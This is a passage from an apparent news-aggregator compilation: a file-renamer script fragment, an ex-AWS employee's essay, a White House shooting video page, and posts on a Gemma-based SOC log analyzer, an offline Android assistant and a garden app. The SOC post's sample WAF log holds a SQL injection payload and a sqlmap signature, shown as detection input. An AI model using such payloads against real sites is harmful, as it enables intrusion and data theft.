        name, ext = os.path.splitext(f)
        new_path = os.path.join(directory, prefix + name + ext)
        print(f"{f} -> {os.path.basename(new_path)}")

if __name__ == "__main__":
    rename_files(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "")
python renamer.py ./photos vacation_
```

This adds a prefix to every file in the directory.

## Advanced Features

The full CLI tool (Bulk Renamer Pro) adds:

- Regex find-and-replace
- Case conversion
- Auto-numbering
- Extension filtering
- Recursive scanning
- Safe dry-run mode

## Why CLI?

- Fast: one command, hundreds of files
- Repeatable: same result every time
- Scriptable: chain with other commands

Built with Python 3. No external dependencies.

---
## Amazon Web Services – Four Years and Out

> Published: 2026-05-24 04:51:22+00:00
> Source: https://www.adventuresinoss.com/aws-four-years/
> wpnews: https://wpnews.pro/news/amazon-web-services-four-years-and-out

After four years at Amazon Web Services (AWS), the author is being fired and expresses relief, citing significant changes to the company since 2022. The primary reasons for their unhappiness were a major organizational shift—specifically the promotion of their supportive manager, David Nalley—and an intensified, desperate focus on Generative AI. The author argues that AWS now treats employees as "fungible" (replaceable) and has lost its customer focus by prioritizing rapid AI content creation over genuine customer needs.

Today marks four years since I joined AWS. My last day will be Friday.
I have to say being fired from AWS is actually a relief. There have been a lot of changes to the company since I joined in 2022, and the company I wanted to work for is no longer the same company.
This past year, while I was doing my best to make AWS play nice in open source communities, there were two main drivers making me unhappy with my job: organizational change and the acceleration of the focus on Generative AI.
The organizational change came in the form of the man who hired me, David Nalley. I was skeptical about joining AWS, especially since I work in open source, but David convinced me that his team, OSSM (Open Source Strategy and Marketing), was dedicated to making AWS a better citizen in open source communities.
Amazon has a really odd viewpoint when it comes to the people who work there. They view almost all employees as “fungible”.
Now the first time I had ever heard the term “fungible” was in reference to non-fungible tokens (NFTs), but it basically means “replaceable”. Amazon built a huge retail business on processes that could take someone who was relatively healthy and relatively intelligent, and turn them in to a productive fulfillment center employee in a couple of weeks. While that may work for a shipping business, it doesn’t translate all that well to information technology, since so much of being successful in that business relies on institutional knowledge that must be earned over time.
It also assumes that there is a limitless supply of people with the required skills, and a willingness to work for Amazon.
In any case, during the interview process David called me “non-fungible” (which still sounds dirty in my mind but did make me proud) and I got the job.
While my official role was to act as a liaison between AWS and customers who were commercial open source companies, I simplified that to mean bring a human face to a huge, faceless corporation.
David was a very good manager. In fact, he is in the running to be the best manager I’ve ever had, although that title still belongs to a man named Jay Clapsadle (who is long since retired). He has an innate understanding of how AWS works, and he would always nudge me into those situations where my unique but limited talents would be put to good use.
Well, last year David, being very good at his job, got promoted to run the entire AWS Developer Experience organization. OSSM is a part of it, but I no longer interacted with him in a meaningful way. My “David Time” went almost to zero.
Also, last year the focus at AWS turned fully and almost desperately toward GenAI.
This post is already too long so I won’t pull out all of the examples I was going to bring up at this point in the narrative, but we started being driven to use as much AI as possible. People were writing things like “I use AI to summarize my email!”. I mentally responded to that with “why don’t we just write better emails?”. And one that really bothered me was “I used one prompt to create my conference presentation!”
In the modern economy, the most valuable commodity is attention. I really appreciate the attention my three readers give to my posts, even when I lose them halfway through. I love giving conference talks and I spend a considerable amount of time creating them, and when someone still wants to speak but doesn’t want to put in the work, it makes me angry. Seriously, why do it?
It has gotten better, but I used to see AI generated images with lots of unintelligible writing or misspelled words in slides, but the speaker left them in anyway. “Good enough” is not customer obsession.
In this whole pivot to GenAI, AWS has lost its focus on the customer. Instead of working backwards from a genuine customer need, the goal seems to be to create as many things as fast as possible, throw them into the world and see which ones gain traction, whether or not they serve a real need.
There is this push to use AI to create content which will ultimately be consumed by AI, and we’ve lost the human being in the process.
When AWS first introduced a viable cloud to the world, it was amazing. Back in the 1990s when you wanted to implement an enterprise software solution, you first had to take a guess at what computing power you would need. Next, you would have to order hardware from companies like Sun Microsystems or Dell and that could take weeks if not months to be delivered. It would then need to be racked, powered and provisioned, and then you were screwed if you happened to undersize it or criticized if you spent too much and oversized it.
The cloud solved those problems, and AWS set the standard with services such as S3, EC2, RDS, etc.
Go to re:Invent these days and try to find a session on those tools. Even when you can, AI will still dominate the presentation.
This whole thing made me question my role. My personal goal is to make AWS the default choice for running open source workloads, but what does that mean when you can simply “vibe code” the same functionality, bypassing the license?
The customer focus at AWS has also changed. Instead of appealing to those people focused on the infrastructure required to build stable and feature-rich applications, it has become abstracted to focus on a level above that, since the whole promise of GenAI is to make those people no longer necessary; to make those people “fungible”.
Last year the achievement I am most proud of involved getting a suspended AWS account reinstated. The financial impact to the company was negligible as this customer wasn’t a huge spender, but they are one of those people that made AWS successful in the first place.
A man in northern Africa posted that his decade-old AWS environment had been shut down with little notice and no recourse. In fact, he was told that his data had been deleted.
I reached out to him to see if I could help, but I wasn’t optimistic. If his data was gone, it was gone, but I really wanted to capture as much as I could about the experience in order to prevent others from having to go through it.
In the process of turning this person from an account number into a human being, I learned more about his situation and, while I won’t share details, losing his AWS account was just one of a long list of issues he was dealing with at the time.
Long story short, I was able to get his resources restored. All I did was manage to poke the right bear and the support team did the rest of the work (and they were amazing). He wrote up a nice post that mentioned me, but the main point of it was that this issue shouldn’t have happened in the first place.
No one in senior management seem to care once the case was closed, but that attitude was not the norm, especially among the rank and file. When that post hit, I had a number of random Amazonians ping me on Slack to thank me, some even going so far as to say I renewed their faith in the company. It was rough in that no one in leadership seemed to care that I did this.
This past year has been rough in other ways. Last October there was a mass layoff but it didn’t impact many people with whom I worked closely. The January mass layoff was much worse, and several friends I’d made at AWS were now looking for work. The stress impacted my health. I’ve gained yet another ten pounds (bringing my four year total to nearly thirty), I consistently set new high scores on the blood pressure machine, and my sleep is so disrupted I haven’t had a single good night’s sleep in weeks (I wrote most of this in a hotel room at [checks watch] 1am).
I cannot stress enough that AWS employs some amazing people, but between the reduction in force and people leaving for better companies, I’m not sure how long that can be sustained. Many good people have left on their own and others, like myself, have been told to leave.
Then there are a number of things that made me embarrassed to work at Amazon. Cory Doctorow did a long post on how Amazon creates “reverse centaurs”. No Amazonians I worked with could read that and not feel at least a little ashamed.
One thing AWS gets right is that it allows a Slack channel called #actual-aws-memes
to exist. While it is heavily moderated, it is a place for people to blow of steam by posting memes about life at AWS. I posted my first (and obviously last) one this past week.
Note that I don’t think that meme was why I got fired, and I want to stress that in my four years at AWS I was never asked to do anything I felt was unethical, much less illegal. But there seems to be a level in this country, and the world in general, where following the law becomes optional.
I didn’t know what my future was at AWS, so being forced to leave is actually a relief. After attending GrafanaCon this year, I really want to get back to my open source roots.
Open source has always been, at least to me, about putting technological power and control into the hands of the user and not the vendor. How will that play out in GenAI, when every state of the art model can only be accessed by API? Even if you want to try to run models locally, who can afford the hardware?
And what do you do when your job is to be a human being in a world of AI?

---
## Special Report: Secret Service kill man who opened fire outside of White House

> Published: 2026-05-24 04:50:14+00:00
> Source: https://www.nbcnews.com/video/special-report-secret-service-kill-man-who-opened-fire-outside-of-white-house-263868485559
> wpnews: https://wpnews.pro/news/special-report-secret-service-kill-man-who-opened-fire-outside-of-white-house

According to the article, the U.S. Secret Service shot and killed a man who opened fire at a security checkpoint outside the White House, leading to a brief lockdown of the premises. The incident, which occurred on May 24, 2026, involved an exchange of gunfire between the suspect and Secret Service agents. NBC News correspondents provided the latest details on the shooting.

Special Report: Secret Service kill man who opened fire outside of White House
10:18
UP NEXT
Gunshots heard near White House
01:27
Pentagon releases newly declassified UFO files
01:30
Trump’s intel chief Tulsi Gabbard steps down
01:48
DHS to require green card applicants to return to home countries to apply
03:24
‘This is our year,’ says Democrat looking to flip Don Bacon’s Nebraska district
07:05
Trump may need to ‘personally’ get involved to fix rift with Senate Republicans: Analysis
17:07
Trump tells Kevin Warsh to 'do your own thing' as Federal Reserve chair
01:24
Republicans Cancel Votes Amid Trump’s ‘Anti-Weaponization’ Fund
02:31
New Jersey voters split over GOP Rep. Tom Kean Jr.'s two-month mysterious medical absence
04:28
Trump says he’ll ‘try’ to attend son’s wedding, but it’s ‘not good timing’
00:37
Trump faces GOP resistance on compensation fund, ballroom money
02:01
DOJ reveals criminal charges over $90 million in alleged Medicaid fraud in Minnesota
01:25
NY congressional candidate on running against AI money and Jack Schlossberg
06:47
Keisha Lance Bottoms says Trump’s ‘chaos’ is a part of her campaign for governor
09:33
‘A complete and total failure’: Calls grow for DNC chair Ken Martin to resign over 2024 autopsy
13:31
Fmr. GOP Sen. Flake says Republicans could begin ‘great migration’ away from Trump
17:52
Trump says it would be a 'disgrace' if Supreme Court upholds birthright citizenship
00:49
When Stephen Colbert ran for president: Meet the Press Archive
31:33
Cuban Americans React to US Indictment of Raúl Castro
02:07
Special Report: Secret Service kill man who opened fire outside of White House
10:18
Copied
The U.S. Secret Service shot amd killed a person who opened fire at a security checkpoint in an exchange of gunfire that briefly locked down the White House, officials said. NBC News correspondents have the latest on the shooting. May 24, 2026

---
## Virtual SOC Analyst

> Published: 2026-05-24 04:46:38+00:00
> Source: https://dev.to/byron_lainez/virtual-soc-analyst-4a5p
> wpnews: https://wpnews.pro/news/virtual-soc-analyst

The article describes an AI-powered Virtual SOC Analyst tool, hosted at analista.byronlainez.click, that uses Gemma 4 to rapidly analyze AWS security logs (such as CloudTrail, WAF, and Nginx) and detect threats like SQL injection in under 30 seconds. It can also identify critical architecture misconfigurations, such as an RDS database exposed in a public subnet, by analyzing uploaded screenshots of AWS architecture diagrams. The system leverages a 128K context window to correlate security events across large log files in a single pass, outputting structured threat analysis, MITRE ATT&CK mappings, and deployment-ready AWS WAF block rules.

## What I Built

** analista.byronlainez.click** is an AI-powered

**Virtual SOC (Security Operations Center) Analyst** that:

- Ingests raw cloud security logs (AWS CloudTrail, WAF, Nginx) with no size limits
- Automatically maps every detected threat to
**MITRE ATT&CK** and**OWASP Top 10** - Generates
**production-ready AWS WAF block rules** and Terraform HCL — copy-paste to deploy - Analyzes
**screenshots of dashboards and architecture diagrams** using Gemma 4's multimodal vision - Runs a
**fully private local mode** where Gemma 4 4B executes inside the browser via WebLLM — your logs never leave your machine

### The Problem It Solves

If you manage AWS infrastructure, you know the pain: **CloudTrail + WAF + Nginx logs grow exponentially**. A production environment generates tens of thousands of security events per hour. When an incident happens:

- Junior SOC analysts hit
**alert fatigue** within 30 minutes of a real incident - Correlating events separated in time (a 2:00 AM port scan and a 5:00 AM SQL injection from the same IP) requires expensive SIEM tooling or hours of manual grep queries
- Writing a WAF block rule takes 10–15 minutes — time that an active attacker is already exploiting

**This tool cuts all of that to under 30 seconds.**

The real enemy in cybersecurity is often not the attacker — it is the sheer **volume of data** that buries the signal inside the noise. Gemma 4 solves this.

## Demo

**Unfortunately, due to the API limit, I couldn't record the video, but I'm leaving the link so you can try it. In the settings, if you don't see the option to enter the API, reduce your window resolution.**

🌐 **Live app:** [analista.byronlainez.click](https://analista.byronlainez.click/)

### End-to-End Example

I fed the tool a raw AWS WAF log containing a SQL injection attempt from an automated scanner:

**Input — raw WAF log:**

```
{
  "timestamp": "2026-05-21T02:14:33Z",
  "action": "ALLOW",
  "httpRequest": {
    "uri": "/api/users?id=1' OR '1'='1",
    "clientIp": "45.33.32.156",
    "country": "RU",
    "headers": [
      { "name": "User-Agent", "value": "sqlmap/1.7" }
    ]
  }
}
```

**Gemma 4 analysis — returned in under 8 seconds:**

```
🚨 THREAT DETECTED — HIGH CONFIDENCE

MITRE Tactic:    Initial Access
MITRE Technique: T1190 — Exploit Public-Facing Application
OWASP Category:  A03:2021 — Injection (SQL Injection)
Attacker IP:     45.33.32.156
Tool Signature:  sqlmap/1.7 (automated SQL injection scanner)

Timeline correlation: This IP performed ICMP reconnaissance
at 01:47 UTC before switching to active exploitation.

Recommended Action: BLOCK immediately and audit all requests
from this source in the last 24 hours for lateral movement.
```

**Auto-generated AWS WAF block rule — ready to deploy:**

```
{
  "Name": "BlockMaliciousIPsGemma",
  "Priority": 10,
  "Statement": {
    "IPSetReferenceStatement": {
      "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/MaliciousIPs/a1b2c3d4"
    }
  },
  "Action": { "Block": {} },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "BlockMaliciousIPsGemmaMetric"
  }
}
```

No editing needed. Paste this directly into AWS Console or deploy via CLI.

### Visual Triage — Multimodal in Action

I uploaded a screenshot of an AWS architecture diagram where a database was sitting in a public subnet. Gemma 4 flagged it without any additional prompting:

```
⚠️ ARCHITECTURE MISCONFIGURATION DETECTED

Finding:     RDS instance appears exposed in a public subnet
Risk Level:  CRITICAL — direct internet-reachable database
MITRE Ref:   T1190, T1078 (Valid Accounts via exposed DB port)

Remediation:
1. Move RDS to a private subnet immediately
2. Configure NAT Gateway for outbound-only connectivity
3. Enable RDS encryption at rest (KMS) if not already active
4. Audit Security Group rules — port 3306/5432 must not be 0.0.0.0/0
```

This second layer of analysis — visual + log correlation — is something no purely text-based model can replicate.

## Code

🔗 **Repository:** [github.com/Byronsasvin/bals-analyst-v2](https://github.com/Byronsasvin/bals-analyst-v2)

### Core Architecture

The system is built around a **structured prompt engineering core** that leverages Gemma 4's 128K context window to correlate security events across massive log files in a single inference pass — no chunking, no summarization loss.

**SOC analyst system prompt (simplified):**

```
SYSTEM_PROMPT = """
You are a senior SOC analyst with expertise in AWS security,
MITRE ATT&CK framework, and OWASP Top 10.

Analyze the provided security logs and return a structured JSON with:
  - threat_detected: boolean
  - confidence: HIGH | MEDIUM | LOW
  - mitre_tactic: string
  - mitre_technique: string (include T-number)
  - owasp_category: string or null
  - attacker_ips: array of strings
  - attack_timeline: chronologically ordered events
  - waf_rule_json: complete AWS WAF rule object, deployment-ready
  - remediation_steps: prioritized action list

If image input is provided, also analyze for:
  - Architecture misconfigurations (public subnets, open ports)
  - Visual anomalies in traffic/metric charts
"""

def analyze(log_content: str, screenshot=None) -> dict:
    messages = [{"role": "user", "content": []}]

    if screenshot:
        # Gemma 4 multimodal: image tokens must precede text tokens
        messages[0]["content"].append({
            "type": "image",
            "image": screenshot
        })

    messages[0]["content"].append({
        "type": "text",
        "text": f"{SYSTEM_PROMPT}\n\nLogs to analyze:\n{log_content}"
    })

    response = gemma4_client.chat(
        messages,
        response_format={"type": "json_object"},
        max_tokens=2048,
        temperature=0.1   # Low temperature = consistent structured output
    )
    return json.loads(response.choices[0].message.content)
```

**Local edge mode — Gemma 4 4B running 100% in-browser:**

``` js
import { CreateWebWorkerMLCEngine } from "@mlc-ai/web-llm";

// Runs in a Web Worker — zero server calls, zero data leakage
const engine = await CreateWebWorkerMLCEngine(
  new Worker(new URL('./worker.js', import.meta.url), { type: 'module' }),
  "gemma-4-4b-it-q4f32_1-MLC",
  { initProgressCallback: (p) => updateProgressBar(p.progress) }
);

async function analyzeLocally(logContent) {
  const reply = await engine.chat.completions.create({
    messages: [
      { role: "system", content: SYSTEM_PROMPT },
      { role: "user",   content: logContent }
    ],
    temperature: 0.1,
    max_tokens: 2048
  });
  return JSON.parse(reply.choices[0].message.content);
}
```

After the model downloads once (~2.5 GB cached in IndexedDB), every analysis run is completely offline. **Your production logs never touch a server.**

## How I Used Gemma 4

I made a **deliberate choice to use two different Gemma 4 variants** for two distinct security scenarios. Here is the reasoning behind each decision.

### Gemma 4 27B — Deep cloud forensics (via Gemini API)

**Why 27B? The 128K context window was the decisive factor.**

I benchmarked the same log analysis task against smaller models and previous-generation LLMs. Every one of them failed in the same way: they either refused files larger than ~30K tokens, or they exhibited the classic "lost in the middle" problem — forgetting events from the beginning of the log by the time they reached the end.

With **Gemma 4 27B**, I fed a complete 72-hour CloudTrail export (~85K tokens) in a single call. It correctly identified a three-hop attack chain:

| Time | IP | Event |
|---|---|---|
| 02:14 UTC | 45.33.32.156 | ICMP sweep — passive reconnaissance |
| 03:47 UTC | 45.33.32.159 | WAF probing — fuzzing for bypasses |
| 05:22 UTC | 45.33.32.157 | Active SQL injection using `sqlmap`
|

**That correlation across 3 hours and 3 rotating IPs from the same subnet would have taken a human analyst 45+ minutes to find manually.** Gemma 4 found it in one inference pass, in under 90 seconds.

This is what the 128K window actually unlocks in a security context: not just "longer documents," but **temporal correlation at scale** without losing context.

### Gemma 4 4B — Privacy-first local analysis (via WebLLM)

**Why 4B in the browser? Because compliance is a hard blocker for most enterprises.**

Uploading production security logs to any external API — even a secure, encrypted one — can violate:

-
**GDPR** Article 28 — data processor agreements and data residency requirements -
**HIPAA**— if HTTP request logs contain PHI embedded in URL parameters -
**PCI-DSS**— cardholder data potentially visible in WAF request logs

By running **Gemma 4 4B locally via WebLLM**, the sensitive data never leaves the user's machine. The model runs in a browser Web Worker with no outbound network calls after the initial model download. This makes the tool usable for banks, hospitals, and any regulated industry that would otherwise be completely blocked from using a cloud API version.

The 4B model handles single-event triage with enough accuracy for real-time alerting. Users who need deep forensic correlation across large log archives can switch to the cloud mode with a single toggle.

### Native multimodal — an unexpected force multiplier

Building the visual triage module revealed something I did not anticipate: **Gemma 4 can read AWS dashboard screenshots with the accuracy of a trained human analyst.**

Feed it a CloudWatch metrics screenshot showing a traffic anomaly, and it correctly identifies:

- The approximate time window of the spike
- Whether the pattern resembles a DDoS, a scraper bot, or a legitimate traffic surge
- Which alarms should have fired but did not — flagging monitoring gaps

This is a second analysis layer that no text-only model can replicate. It required zero extra tooling — just passing the screenshot as native image input to Gemma 4.

## From MVP to Enterprise: The Closed-Loop SOC Pipeline

This app is a working MVP. Here is how the same architecture scales to a fully automated, production-grade SecOps pipeline:

```
AWS WAF / CloudTrail
        │
        ▼
Amazon Kinesis Firehose      ← real-time event stream
        │
        ▼
Classifier Lambda             ← fast filter: normal vs suspicious
        │ (suspicious events only)
        ▼
analista.byronlainez.click API
        │
        ▼
Gemma 4 31B Dense             ← deep reasoning + timeline correlation
        │
        ▼
Generate WAF Rule JSON
        │
        ▼
Lambda → Update WAF IP Set   ← automatic block in ~200ms
        │
        ▼
Slack / Teams webhook         ← SOC team notified with full report
```

**What this closed-loop approach delivers:**

-
**Zero-touch threat containment**— from detection to active block in under 500ms, with no human in the loop for high-confidence threats -
**Automated IAM privilege audits**— Gemma 4 31B Dense running nightly scans of all IAM policies, surfacing silent privilege escalation paths before attackers find them -
**SIEM enrichment**— structured threat reports pushed directly into Splunk, Microsoft Sentinel, or any webhook-compatible platform

That is what open-weights models like Gemma 4 make possible — and why I believe this architecture represents the future of accessible, privacy-respecting enterprise security.

Try ** analista.byronlainez.click** with your own logs.

What threats did Gemma 4 find in your infrastructure? Drop your results in the comments 👇

---
## How I built a fully offline AI assistant on Android with Gemma 4 E2B

> Published: 2026-05-24 04:43:53+00:00
> Source: https://dev.to/manoj_shetty/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b-5a19
> wpnews: https://wpnews.pro/news/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b

The article describes the creation of PocketClaw, a fully offline Android AI assistant built using Google's Gemma 4 E2B model. The assistant runs entirely on-device with a 1.5 GB INT4 quantized model, enabling features like chat, voice transcription, image analysis, PDF queries, and device control (e.g., flashlight, alarms, SMS) without internet dependency. The developer built the app solo in 17 days, leveraging Flutter, MediaPipe for vision, Gecko embeddings for on-device RAG, and native Android intents for device actions.

# How I built a fully offline AI assistant on Android with Gemma 4 E2B

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4.*

## What I built

PocketClaw is an Android assistant that runs entirely on your phone. You can chat with it, talk to it (press and hold the mic, it transcribes live), show it photos, hand it a PDF and ask questions about it, or tell it to turn on the flashlight, set an alarm, open the dialer, send an SMS, drop something on the calendar, search the web, or fire a notification. All of that runs on a 1.5 GB model that lives on the device.

Once the model is downloaded the first time, you can switch on airplane mode. Nothing breaks.

I built it solo, 17 days, for this challenge.

**Repo:** [github.com/ManojRakshu/pocketclaw](https://github.com/ManojRakshu/pocketclaw) (MIT)

## Why on-device and why E2B

I've been building agents on cloud LLMs for about a year and a half. Claude mostly, GPT-4 for a few things. Every agent I've put in front of users has had the same set of problems sitting behind it. Latency adds up when you're chaining calls. The cost per call gets real once you have real traffic. And the whole thing stops the second the network goes down.

Phones are interesting because they fix all three of those at once. Model lives on the device, so there's no per-call cost. No network in the loop, so latency is just silicon. And the network can disappear without anything breaking.

The thing that constrains you is RAM. A mid-range Android phone gives an app something like 1.5 to 2 GB of usable working memory before the OS starts pushing back. That's enough to rule out most of the Gemma 4 family:

-
**E2B** at about 1.5 GB INT4. Fits. Has vision built in. This is what I shipped. - E4B at about 2.5 GB. Tight on high-end phones, OOMs on lower-end ones.
- 26B MoE. Workstation.
- 31B dense. Server.

I built and tested on a OnePlus Nord CE 4 (Snapdragon 7s Gen 3, Adreno GPU, 8 GB RAM, Android 14). First-token latency is around 1 to 3 seconds for chat, around 5 for vision. Slower than cloud. But there's no network in the way.

The 1.5 GB number is worth being precise about. Full precision E2B (fp32) is roughly 20 GB. fp16 is 10. INT8 is 5. INT4 with Google's litert-lm packaging gets you down to 1.5 GB. Same precision class as what Google ships in Pixel's Gemini Nano. For phones, INT4 is the only answer that makes sense.

## How it's put together

Three layers.

**The model.** I'm using `flutter_gemma`

, which wraps Google's MediaPipe LLM API and LiteRT-LM on Android. I picked it because among the Flutter plugins I evaluated, it had the most mature support for Gemma 4's vision input. There's a cost to this. The MediaPipe stack adds about 80 MB of native libraries to the APK. Lighter, text-focused alternatives (llama.cpp wrappers, etc.) can ship at 30-60 MB. My release APK is 152 MB, down from 185 after I trimmed image-generation and WebGPU runtimes via Gradle (the plugin bundles them, we never use them):

```
// android/app/build.gradle.kts
packaging {
    jniLibs {
        excludes.addAll(listOf(
            // We never generate images, only consume them.
            "**/libimagegenerator_gpu.so",
            "**/libmediapipe_tasks_vision_image_generator_jni.so",
            // WebGPU is for browsers, useless on Android.
            "**/libLiteRtWebGpuAccelerator.so",
            "**/libLiteRtTopKWebGpuSampler.so"
        ))
    }
}
```

If you don't need vision you can probably get below 80 MB by switching to a text-focused stack. I needed vision so I'm at 152.

**RAG on-device.** A second model handles embeddings. Gecko 110M, around 110 MB on disk. I went with Gecko over EmbeddingGemma 300M because Gecko is roughly 3x smaller and the retrieval quality on PDFs of a hundred pages or less was comparable. Could be different at larger corpora. The pipeline is Syncfusion for PDF extraction, my own chunker (paragraph split, merge tinies, sentence-aware sub-split for anything still over the threshold), Gecko for embedding, sqlite-vec with HNSW for the vector store. All on device.

**Device actions.** Gemma's job here is intent classification. The user types or says "set an alarm for 7:30 AM". Gemma emits a structured JSON object that identifies the tool and parameters. Dart parses it. A native Kotlin MethodChannel (`pocketclaw/device`

) fires the right Android intent. Eight categories work this way. Flashlight via `CameraManager.setTorchMode`

. Alarms via `AlarmClock.ACTION_SET_ALARM`

. Dialer via `ACTION_DIAL`

. SMS via `ACTION_SENDTO`

. Calendar via `ACTION_INSERT`

. Location settings panel. Web search by handing the query to the default browser. Local notifications via `NotificationManager`

. Nothing in the loop touches the network. The LLM doesn't even know the network exists.

## Things that broke

### RAG dies on generic queries

Vanilla RAG works fine for specific questions. Someone uploads a PDF about PocketClaw, asks "who built PocketClaw", retrieval picks up a chunk that contains my name, Gemma summarises, done.

It falls over on the queries people actually type. I caught this Friday afternoon. I'd shipped what I thought was a working build. I uploaded `llmaiedge.pdf`

(a PDF about edge LLMs I had lying around), typed "summarise the document", hit send. Claw answered with "Summarize the document." That's it. I tried twice more with different phrasing. Same answer. Eventually I typed "summarise llmaiedge.pdf" and got a real response. The filename was doing the work, not my retrieval.

The problem is that "summarise this doc" has no semantic overlap with the actual document text. The doc doesn't contain the words "summarise" or "this doc." Cosine similarity returns nothing useful, the prompt goes to Gemma with no real context, and Gemma fills in with whatever its training data feels like saying about generic documents.

The fix runs two heuristics:

```
final isGenericIntent = hits.length <= 1 && (
    lower.contains('summari') ||
    lower.contains('tldr') ||
    lower.contains('explain') ||
    lower.contains('describe') ||
    lower.contains('the document') ||
    lower.contains('the pdf')
    // ... a few more
);

if (isGenericIntent) {
    // Fall back to searching with each indexed doc's filename as the query.
    hits = await RagService.instance.getDocStarts(
        conversationId: _conversation.id,
    );
}
```

`getDocStarts`

runs `searchSimilar`

once per indexed doc, using the filename itself as the query. Filenames are rare distinctive tokens. Every chunk in the vector store has the filename in metadata. So this pulls back real chunks regardless of how the user phrased their question. Two lines of conditional logic, and the difference between a broken demo and a working one.

### Small models drop facts buried mid-prompt

I wanted Claw to remember the user's name. Onboarding asks for it, prefs stores it, the system prompt includes it. User asks "what's my name?" Claw says "I do not know your name."

The first version of my system prompt looked like this:

```
You are Claw. You run locally and offline. You are talking to Manoj Shetty.
Match your answer length to the question. Prefer plain answers over preambles.
Never restate the question. If unsure, say so briefly.
```

The third sentence has the name. Gemma 4 E2B dropped it completely. I burned about an hour staring at this before I figured out what was happening. My theory is that "never restate the question" was acting as a dominant instruction that generalized to "don't reference user context at all." Small models do that. Cloud LLMs don't.

The fix was to move the fact to the top of the prompt:

```
final namePart = (userName != null && userName.trim().isNotEmpty)
    ? "The name of the user is ${userName.trim()}.\n\n"
    : '';
final systemPreamble = '${namePart}You are Claw, ...';
```

Same information. First line of the prompt, on its own, in a flat declarative sentence. Worked first try.

Lesson I've now learned twice. With small models, what you want the model to know goes at the front, in simple sentences, without competing instructions next to it. Cloud LLMs respect the whole prompt. 2B models don't.

### Audio in flutter_gemma is framed for Gemma 3n, not Gemma 4

I wanted to skip the speech-to-text plugin entirely. Just feed audio bytes directly to Gemma 4 E2B's audio modality. The model card says E2B supports audio. Cleaner architecture, one fewer dependency.

I went to dig into `flutter_gemma`

v0.15.1 source. Eight different files in the plugin frame audio as a Gemma 3n E4B feature, including this in the interface:

```
/// [supportAudio] — whether the model supports audio (Gemma 3n E4B only).
bool supportAudio = false,
```

The example app makes the real constraint clearer: `.litertlm`

files that bundle `TF_LITE_AUDIO_ENCODER`

work with `supportAudio: true`

, `.task`

files don't. So the actual limit isn't the Gemma version — it's whether your specific model file contains the audio encoder. I haven't found a Gemma 4 E2B `.litertlm`

build that bundles the audio encoder, and the plugin's docs treat audio as 3n-territory.

So PocketClaw uses Android system STT via the `speech_to_text`

package, which is a wrapper around `RecognizerIntent`

. Side benefit: I get live transcription as the user speaks, which is genuinely a better UX than the "hold, release, wait three seconds, see both the transcription and the response" pattern you'd get from on-model audio. When a Gemma 4 E2B `.litertlm`

build with audio encoder ships, the voice path collapses into a single multimodal call. Not blocking on v1.

## Long chats and memory

Gemma 4 has a 128K context window. That's plenty in theory. In practice, every token costs latency and RAM, so I'd rather not feed the whole history every turn.

PocketClaw keeps the most recent 24 messages in full text. Anything older runs through a compaction pass:

- Extract facts the user has stated explicitly ("I am X", "My name is Y", "Remember Z").
- Capture unresolved goals (keywords like "fix", "todo", "issue").
- Compile the whole thing into a single lightweight summary paragraph that gets prepended to the prompt as memory.

The more aggressive part: when an image message slides past the 24-message boundary, the raw image bytes get deleted. What stays is the assistant's prior textual description of that image:

```
String _imageMemoryFromAssistant({
  required String? imageName,
  required String assistantText,
}) {
  final label = imageName ?? 'uploaded image';
  return 'Assistant previously described $label as: ${_shorten(assistantText, 1000)}';
}
```

Claw still "remembers" what it saw, but without the bytes weighing on the prompt. This matters more than it sounds like it should. A 1 MB photo as base64 is around 30K tokens. The textual description of the same image is around 100. So this is roughly a 300x compression of image memory, with surprisingly little loss for the kinds of follow-up questions users actually ask.

## Stack

Flutter 3.41 / Dart 3.11. Chat model is Gemma 4 E2B INT4 at 1.5 GB, loaded through `flutter_gemma`

on top of MediaPipe LLM and LiteRT-LM. Embedder is Gecko 110M (110 MB) for RAG. Vector store is sqlite-vec with HNSW, on device. Speech-to-text is the system STT via `speech_to_text`

. Eight device actions go through a Kotlin MethodChannel. Hive for state (separate boxes for conversations, documents, prefs). `syncfusion_flutter_pdf`

for PDF extraction. The theme is custom neobrutalistic dark with hard borders, monospace type, and cyan/purple/mint accents. I wanted it to feel like a piece of hardware, not a Material 3 chat app.

## What didn't make v1

A **floating overlay bubble** (Android 13+ accessibility-style overlay) was in the original design. I cut it because the overlay permission UX has a long tail I didn't want to ship rough.

**Direct Gemma 4 audio input.** Waiting on a Gemma 4 E2B `.litertlm`

build with the audio encoder. v2 when that's available.

**Per-message RAG toggle.** Rig

---
## How I Got Users to Willingly Wait 1 Minute for an API Call (Without Over-Engineering)

> Published: 2026-05-24 04:43:34+00:00
> Source: https://dev.to/cathylai/how-i-got-users-to-willingly-wait-1-minute-for-an-api-call-without-over-engineering-2coc
> wpnews: https://wpnews.pro/news/how-i-got-users-to-willingly-wait-1-minute-for-an-api-call-without-over

The article describes how the developer of an AI garden visualizer app addressed the problem of a one-minute API wait time by displaying illustrated garden tips during the delay. Instead of trying to hide or eliminate the wait through complex engineering, the developer used a simple `setInterval` function to rotate tips every 7 seconds, turning the waiting period into a learning experience. This shift in perspective transformed the app from a simple image generator into a helpful gardening companion, demonstrating that changing user experience can be more effective than technical optimization.

One of the most awkward parts of building my AI garden visualizer was not actually the AI itself — it was the waiting time.
The image generation API I used could take close to a minute to return a result. From a developer’s perspective, the obvious solutions might be
But none of these is ideal - some of them require days of work and research. But - I haven't even got any users for the app!
Most homeowners using this app are not garden experts. Many feel overwhelmed by messy backyards, overgrown plants, drainage issues, or simply not knowing where to begin. They do not necessarily want to study gardening for weeks. They want quick, practical guidance that helps them feel more confident immediately.
So instead of trying to “hide” the waiting time, I decided to use it.
During the AI processing phase, the app now displays simple illustrated garden tips every few seconds — almost like a lightweight PowerPoint presentation. Each screen is designed to be scannable within 7–10 seconds:
Then use setInterval to display them
// use setInterval() to display an garden tip every 7 seconds
window.setInterval(() => {
setTipVisible(false);
// use setTimeout to fade in/out
timeoutId = window.setTimeout(() => {
setTipIndex((prevIndex) => getRandomTipIndex(prevIndex));
setTipVisible(true);
}, 500);
}, 7000);
The interesting thing is that users no longer feel like they are waiting. They are learning.
